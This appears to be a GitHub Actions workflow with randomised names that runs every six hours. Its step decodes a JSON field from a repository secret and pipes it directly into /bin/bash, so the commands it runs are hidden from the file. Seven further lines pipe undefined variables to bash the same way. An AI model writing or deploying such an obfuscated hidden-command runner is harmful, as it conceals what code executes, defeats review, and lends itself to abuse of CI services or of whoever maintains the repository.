name: heqizheng6789

on:
  workflow_dispatch:
  schedule:
    - cron: '45 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: heqizheng6789
        env:
          jl848: ${{ secrets.jl848 }}
        run: |
          echo $jl848 | jq -r .yd16117 | /bin/bash
          echo $asi4 | jq -r .uq88 | /bin/bash
          echo $skgl749 | jq -r .vmxix8644 | /bin/bash
          echo $qjnug97199 | jq -r .om171 | /bin/bash
          echo $l41 | jq -r .dm0 | /bin/bash
          echo $krvzh68999 | jq -r .rua85 | /bin/bash
          echo $kteqv0904 | jq -r .ia13 | /bin/bash
          echo $jlkw157 | jq -r .kz5970 | /bin/bash

